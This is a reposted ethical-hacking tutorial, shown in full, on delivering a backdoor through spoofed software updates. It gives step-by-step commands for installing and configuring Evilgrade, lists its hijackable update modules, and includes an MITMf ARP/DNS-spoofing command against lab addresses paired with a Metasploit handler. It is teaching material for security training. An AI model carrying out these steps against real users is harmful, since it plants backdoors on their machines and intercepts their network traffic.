首页 > 数据库技术 > 详细

Ethical Hacking - GAINING ACCESS(12)

时间:2020-01-04 01:27:24      阅读:123      评论:0      收藏:0      [点我收藏+]

CLIENT SIDE ATTACKS

Backdoor delivery method1 - Spoofing Software Updates

Fake an update for an already installed program.

Install the backdoor instead of the update.

Require DNS spoofing + Evilgrade(a server to serve the update).

1. Download and install Evilgrade.

https://github.com/infobyte/evilgrade

git clone https://github.com/infobyte/evilgrade.git

cd evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML

技术分享图片

 技术分享图片

 

 技术分享图片

 

 技术分享图片

 技术分享图片

 

 

 OR

apt-get install isr-evilgrade

技术分享图片

 

 

 

2. Start Evilgrade. 

evilgrade

 技术分享图片

 

 

 

3. Check programs that can be hijacked.

show modules

 

List of modules:
===============

acer
allmynotes
amsn
appleupdate
appstore
apptapp
apt
asus
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
fsecure_client
getjar
gom
googleanalytics
growl
inteldriver
isopen
istat
itunes
jdtoolkit
jet
jetphoto
keepass
lenovo
lenovoapk
lenovofirmware
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openbazaar
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
port
quicktime
safari
samsung
skype
soapui
sparkle
sparkle2
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
timedoctor
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 80 modules available.

 

4. Select one

configure [module]

 技术分享图片

5. Set backdoor location.

set agent [agent location]

 

 技术分享图片

 

 

6. Start server

start

 技术分享图片

 

 

7. Start DNS spoofing and handler.

 Modify the mitmf.conf file.

技术分享图片

 Start MITMF:

pyton2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns

技术分享图片

 

 Msf:

技术分享图片

 

 

Install the update on target machine. Then you can run the backdoor program>>

技术分享图片

 

Ethical Hacking - GAINING ACCESS(12)

原文:https://www.cnblogs.com/keepmoving1113/p/12147545.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!